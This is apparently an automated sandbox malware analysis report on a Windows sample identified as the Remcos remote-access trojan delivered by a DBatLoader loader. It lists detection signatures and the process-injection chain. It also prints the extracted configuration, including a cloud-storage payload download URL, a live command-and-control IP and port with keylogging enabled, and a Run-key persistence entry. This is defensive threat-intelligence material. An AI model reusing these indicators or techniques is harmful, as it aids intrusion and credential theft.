Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HGTQP09643009.scr.exe

Overview

General Information

Sample name:HGTQP09643009.scr.exe
Analysis ID:1441701
MD5:c8b0899dd51c7516316ed413771e71c4
SHA1:e9e407a9a7f7655940b1a7b48ac02b740d004004
SHA256:841200c9e115b489adb33d27e4fcd1f6769609e5c378a45ef1d371200bd9a41c
Tags:exeModiLoaderRemcos
Infos:

Detection

Remcos, DBatLoader, PrivateLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Snort IDS alert for network traffic
Yara detected DBatLoader
Yara detected PrivateLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files with a suspicious file extension
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Child Processes Of SndVol.exe
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • HGTQP09643009.scr.exe (PID: 5900 cmdline: "C:\Users\user\Desktop\HGTQP09643009.scr.exe" MD5: C8B0899DD51C7516316ED413771E71C4)
    • extrac32.exe (PID: 5948 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\HGTQP09643009.scr.exe C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • SndVol.exe (PID: 6352 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
      • SndVol.exe (PID: 5480 cmdline: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr" MD5: BD4A1CC3429ED1251E5185A72501839B)
      • SndVol.exe (PID: 4688 cmdline: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv" MD5: BD4A1CC3429ED1251E5185A72501839B)
      • SndVol.exe (PID: 6052 cmdline: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv" MD5: BD4A1CC3429ED1251E5185A72501839B)
      • SndVol.exe (PID: 6804 cmdline: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv" MD5: BD4A1CC3429ED1251E5185A72501839B)
      • SndVol.exe (PID: 5680 cmdline: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\jhbdectkjqlx" MD5: BD4A1CC3429ED1251E5185A72501839B)
      • Jsqwmpul.PIF (PID: 6804 cmdline: "C:\Users\Public\Libraries\Jsqwmpul.PIF" MD5: C8B0899DD51C7516316ED413771E71C4)
        • colorcpl.exe (PID: 5900 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Jsqwmpul.PIF (PID: 2172 cmdline: "C:\Users\Public\Libraries\Jsqwmpul.PIF" MD5: C8B0899DD51C7516316ED413771E71C4)
    • SndVol.exe (PID: 1080 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader
{"Download Url": ["https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng"]}
{"Host:Port:Password": "107.175.229.139:8087:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TLPQMO", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
            0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c375:$a1: Remcos restarted by watchdog!
            • 0x6c8ed:$a3: %02i:%02i:%02i:%03i
            Click to see the 31 entries
            SourceRuleDescriptionAuthorStrings
            0.2.HGTQP09643009.scr.exe.2900000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              3.2.SndVol.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                3.2.SndVol.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  3.2.SndVol.exe.400000.0.unpackJoeSecurity_PrivateLoaderYara detected PrivateLoaderJoe Security
                    3.2.SndVol.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aaa8:$a1: Remcos restarted by watchdog!
                    • 0x6b020:$a3: %02i:%02i:%02i:%03i
                    Click to see the 68 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , CommandLine: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Jsqwmpul.PIF, NewProcessName: C:\Users\Public\Libraries\Jsqwmpul.PIF, OriginalFileName: C:\Users\Public\Libraries\Jsqwmpul.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , ProcessId: 2172, ProcessName: Jsqwmpul.PIF
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Jsqwmpul.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\HGTQP09643009.scr.exe, ProcessId: 5900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Jsqwmpul
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 13.107.139.11, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\Jsqwmpul.PIF, Initiated: true, ProcessId: 2172, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49710
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Jsqwmpul.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\HGTQP09643009.scr.exe, ProcessId: 5900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Jsqwmpul
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , CommandLine: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Jsqwmpul.PIF, NewProcessName: C:\Users\Public\Libraries\Jsqwmpul.PIF, OriginalFileName: C:\Users\Public\Libraries\Jsqwmpul.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , ProcessId: 2172, ProcessName: Jsqwmpul.PIF
                    Source: Process startedAuthor: X__Junior (Nextron Systems): Data: Command: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr", CommandLine: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\SndVol.exe, NewProcessName: C:\Windows\SysWOW64\SndVol.exe, OriginalFileName: C:\Windows\SysWOW64\SndVol.exe, ParentCommandLine: C:\Windows\System32\SndVol.exe, ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 6352, ParentProcessName: SndVol.exe, ProcessCommandLine: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr", ProcessId: 5480, ProcessName: SndVol.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\SndVol.exe, ProcessId: 6352, TargetFilename: C:\ProgramData\remcos\logs.dat
                    Timestamp:05/15/24-01:59:19.345728
                    SID:2032777
                    Source Port:8087
                    Destination Port:49707
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/15/24-01:56:51.986638
                    SID:2032776
                    Source Port:49707
                    Destination Port:8087
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                    Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                    Source: HGTQP09643009.scr.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng"]}
                    Source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "107.175.229.139:8087:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TLPQMO", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: 107.175.229.139Virustotal: Detection: 17%Perma Link
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFReversingLabs: Detection: 60%
                    Source: C:\Users\Public\Libraries\Jsqwmpul.PIFVirustotal: Detection: 60%Perma Link
                    Source: HGTQP09643009.scr.exeReversingLabs: Detection: 60%
                    Source: HGTQP09643009.scr.exeVirustotal: Detection: 60%Perma Link
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_00433837
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05384504 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_05384504
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,4_2_00404423
                    Source: SndVol.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    barindex
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_004074FD _wcslen,CoGetObject,3_2_004074FD

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeUnpacked PE file: 0.2.HGTQP09643009.scr.exe.2900000.0.unpack
                    Source: HGTQP09643009.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49722 version: TLS 1.2
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdbH source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp

                    Spreading

                    barindex
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\HGTQP09643009.scr.exeCode function: 0_2_029058B4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_029058B4
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409253
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C291
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C34D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409665
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0044E879 FindFirstFileExA,3_2_0044E879
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_0040880C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040783C FindFirstFileW,FindNextFileW,3_2_0040783C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419AF5
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB30
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD37
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05358509 FindFirstFileW,FindNextFileW,3_2_05358509
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0539F546 FindFirstFileExA,3_2_0539F546
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_053594D9 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_053594D9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535C7FD FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0535C7FD
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536A7C2 FindFirstFileW,3_2_0536A7C2
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535D01A FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0535D01A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535A332 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_0535A332
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_05359F20 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_05359F20
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0536CF5E FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0536CF5E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_0535CA04 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0535CA04
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_1E6C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_1E6C10F1
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_1E6C6580 FindFirstFileExA,3_2_1E6C6580
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,4_2_0040AE51
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407EF8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 3_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00407C97

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49707 -> 107.175.229.139:8087
                    Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 107.175.229.139:8087 -> 192.168.2.5:49707
                    Source: Yara matchFile source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
